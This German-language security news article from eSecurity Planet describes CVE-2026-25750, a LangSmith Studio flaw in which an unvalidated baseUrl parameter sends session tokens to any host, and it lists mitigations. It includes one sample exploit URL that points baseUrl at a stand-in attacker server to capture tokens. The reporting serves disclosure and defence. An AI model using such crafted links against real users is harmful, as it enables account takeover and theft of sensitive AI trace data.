Hacke das KI-Gehirn: LangSmith-Schwachstelle könnte sensible KI-Daten offenlegen

Eine LangSmith-Schwachstelle könnte es Angreifern ermöglichen, Konten zu kapern und auf sensible Daten aus KI-Workflows zuzugreifen.

Verfasst von
Ken Underhill
Ken Underhill
Mar 13, 2026
4 minute read
eSecurity Planet Inhalte und Produktempfehlungen sind redaktionell unabhängig. Wir können Geld verdienen, wenn Sie auf Links zu unseren Partnern klicken. Mehr erfahren

Eine Schwachstelle in LangSmith, einer weithin genutzten Plattform zur Beobachtung von KI-Systemen, hätte Angreifern ermöglichen können, Benutzerkonten zu kapern und auf sensible Unternehmensdaten zuzugreifen, die durch Systeme mit Large Language Models (LLMs) fließen.

Forscher von Miggo Security entdeckten die Schwachstelle, die bei einem Besuch einer bösartigen Webseite durch einen angemeldeten Benutzer den Diebstahl von Tokens und die Kontoübernahme ermöglichen konnte. 

Die Schwachstelle „… setzte Nutzer dem potenziellen Diebstahl von Tokens und einer Kontoübernahme aus“, sagten die Forscher.

Wie CVE-2026-25750 eine Kontoübernahme ermöglicht

LangSmith spielt eine zentrale Rolle bei der modernen Entwicklung und dem Betrieb von KI-Systemen und dient Unternehmen, die Anwendungen mit Large Language Models (LLMs) entwickeln und bereitstellen, als Beobachtungsschicht. 

Die Plattform wird häufig eingesetzt, um das Modellverhalten zu überwachen, Fehler zu beheben und während KI-Workflows erzeugte Ausführungs-Trace-Daten zu analysieren. 

In der Praxis bedeutet das, dass LangSmith enorme Mengen an Telemetrie- und Debugging-Daten verarbeitet, während Unternehmen ihre KI-Systeme weiterentwickeln und warten.

Da LangSmith an der Schnittstelle von Anwendungslogik, internen Tools und Datenpipelines von Unternehmen sitzt, enthält die Plattform häufig hochsensible operative Informationen. 

Trace-Protokolle können detailliert festhalten, wie ein KI-System während der Laufzeit mit Datenbanken, APIs und internen Diensten interagiert. 

Laut der Untersuchung von Miggo Security könnten Angreifer, die die Schwachstelle erfolgreich ausnutzten, potenziell auf sensible Daten in diesen Protokollen zugreifen – darunter interne SQL-Abfragen, proprietäre System-Prompts, API-Antworten oder sogar Kundendatensätze. 

Für Unternehmen, die LangSmith zur Beobachtung von LLM-Workflows einsetzen, könnte eine Kontoübernahme daher nicht nur Chat-Protokolle offenlegen, sondern auch die zugrunde liegende Logik und die Datenflüsse, auf denen ihre KI-Systeme basieren.

Advertisement

So funktioniert die LangSmith-Schwachstelle

Die als CVE-2026-25750 geführte Schwachstelle ging auf eine Konfigurationsfunktion in LangSmith Studio zurück, der Entwickleroberfläche der Plattform. 

Studio soll Entwicklern Flexibilität bieten, wenn sie die Oberfläche lokal oder in Remote-Umgebungen ausführen und gleichzeitig auf ihr authentifiziertes Cloud-Konto zugreifen möchten. 

Zu diesem Zweck akzeptiert die Anwendung den Parameter baseUrl, der den Endpunkt der Backend-API angibt, mit dem die Studio-Oberfläche kommunizieren soll.

Unter normalen Umständen ermöglicht dieser Parameter Entwicklern, API-Aufrufe an verschiedene Umgebungen wie Staging- oder Entwicklungssysteme umzuleiten. 

Zuvor validierte die Anwendung die im Parameter baseUrl angegebene Domain nicht. Dadurch vertraute das Frontend dem vom Benutzer bereitgestellten Wert und sendete API-Anfragen – einschließlich Authentifizierungsdaten – an jedes angegebene Ziel.

So konnten Angreifer den Exploit auslösen

Diese fehlende Validierung eröffnete Angreifern die Möglichkeit, eine bösartige URL zu erstellen, die authentifizierte Anfragen umleiten sollte. 

Beispielsweise konnte ein Angreifer einen Link wie diesen erzeugen:

https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com

Wenn ein Opfer, das bereits bei LangSmith angemeldet war, eine Webseite besuchte, die diese URL automatisch auslöste – etwa durch ein bösartiges Skript oder eine eingebettete Weiterleitung –, lud der Browser die legitime LangSmith-Studio-Oberfläche. 

Statt API-Anfragen an das offizielle LangSmith-Backend zu senden, leitete die Oberfläche die Anfragen jedoch unbemerkt an den vom Angreifer kontrollierten Server weiter.

Da das Opfer bereits über eine aktive authentifizierte Sitzung verfügte, fügte der Browser der Anfrage die Sitzungsdaten des Benutzers hinzu. 

Der Angreifer konnte die Anfrage anschließend abfangen, das Sitzungstoken erfassen und sich damit als das Opfer ausgeben.

Advertisement

Worauf Angreifer zugreifen können

Nach Angaben der Forscher blieb das gestohlene Sitzungstoken etwa fünf Minuten lang gültig – genug Zeit für Angreifer, auf das Konto des Opfers zuzugreifen, Daten abzurufen oder Einstellungen zu ändern.

Eine erfolgreiche Ausnutzung hätte es Angreifern ermöglichen können, System-Prompts zu stehlen, die das Verhalten der KI eines Unternehmens festlegen, Tool-Ein- und -Ausgaben mit möglicherweise sensiblen Daten wie personenbezogenen Daten, Gesundheitsdaten oder Finanzunterlagen zu exfiltrieren sowie Projekte zu ändern oder zu löschen.

Zum Zeitpunkt der Veröffentlichung gab es keine Belege dafür, dass die Schwachstelle in freier Wildbahn ausgenutzt wurde; eine Fehlerbehebung wurde veröffentlicht.

Risiken bei Plattformen zur KI-Überwachung eindämmen

Da Plattformen zur Beobachtung von KI-Systemen zunehmend in Unternehmensumgebungen eingebettet werden, entwickeln sie sich zu attraktiven Zielen für Angreifer. 

Die LangSmith-Schwachstelle zeigt, wie Fehler in der Konfiguration oder Geschäftslogik sensible Daten offenlegen können, die durch KI-Systeme fließen. 

Unternehmen sollten diese Plattformen als kritische Infrastruktur behandeln und dieselbe Sicherheitsstrenge anwenden, mit der sie zentrale Cloud-Dienste und Datenpipelines schützen.

  • Pachte selbst gehostete LangSmith-Bereitstellungen auf die neueste Version auf, um sicherzustellen, dass die Richtlinie für zulässige Ursprünge bösartige baseUrl-Anfragen blockiert.
  • Überwache Protokolle und Plattformaktivitäten auf ungewöhnliche API-Aufrufe, unerwartete ausgehende Anfragen oder untypische Zugriffe auf Trace-Daten, die auf einen Missbrauch von Tokens hindeuten könnten.
  • Rotiere Sitzungstokens, API-Schlüssel und andere Zugangsdaten, wenn eine Kompromittierung vermutet wird, und setze nach Möglichkeit kürzere Sitzungsdauern durch.
  • Begrenze die Offenlegung sensibler Daten in Traces zur KI-Beobachtung, indem du Prompts, Antworten und Tool-Ausgaben bereinigst, bevor sie die Überwachungssysteme erreichen.
  • Setze Identitätskontrollen wie MFA, SSO-Richtlinien sowie Zugriffe nach dem Prinzip der geringsten Privilegien für Plattformen zur KI-Beobachtung und KI-Tools durch.
  • Implementiere Netzwerk- und Browser-Sicherheitskontrollen – etwa DNS-Filter, Beschränkungen für ausgehenden Datenverkehr und sichere Browser-Richtlinien –, um Verbindungen zu von Angreifern kontrollierten Domains zu verhindern.
  • Teste regelmäßig Notfallpläne, erstelle Playbooks für die Ausnutzung von Plattformen zur KI-Beobachtung und nutze Angriffssimulations-Tools.
Advertisement

Zusammen helfen diese Maßnahmen Unternehmen dabei, ihre Gefährdung durch Risiken einer Kontoübernahme zu verringern und zugleich ihre Widerstandsfähigkeit gegen Angriffe auf Plattformen zur KI-Beobachtung zu erhöhen.

KI-Infrastruktur vergrößert die Angriffsfläche

Die LangSmith-Schwachstelle steht für einen größeren Wandel in der Frage, wie Unternehmen über KI-Infrastruktur denken sollten. 

Plattformen zur Beobachtung von KI-Systemen stehen inzwischen im Zentrum vieler KI-Pipelines und sammeln Trace-Daten, die proprietäre Prompts, operative Workflows und andere sensible Unternehmensinformationen enthalten können. 

Diese Tools sollen zwar Debugging und Transparenz verbessern, doch ihr Zugriff auf interne Systeme kann sie bei schwachen Sicherheitskontrollen zu attraktiven Zielen machen.

zu Zero-Trust-Lösungen, die davon ausgehen, dass standardmäßig keinem System, keiner Anwendung und keinem Benutzer vertraut werden sollte.

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.

eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

Eigentum von TechnologyAdvice. © 2026 TechnologyAdvice. Alle Rechte vorbehalten

Werbetreibenden-Offenlegung: Einige der auf dieser Website erscheinenden Produkte stammen von Unternehmen, von denen TechnologyAdvice eine Vergütung erhält. Diese Vergütung kann beeinflussen, wie und wo Produkte auf dieser Website erscheinen, einschließlich beispielsweise der Reihenfolge, in der sie erscheinen. TechnologyAdvice schließt nicht alle Unternehmen oder alle auf dem Marktplatz verfügbaren Produkttypen ein.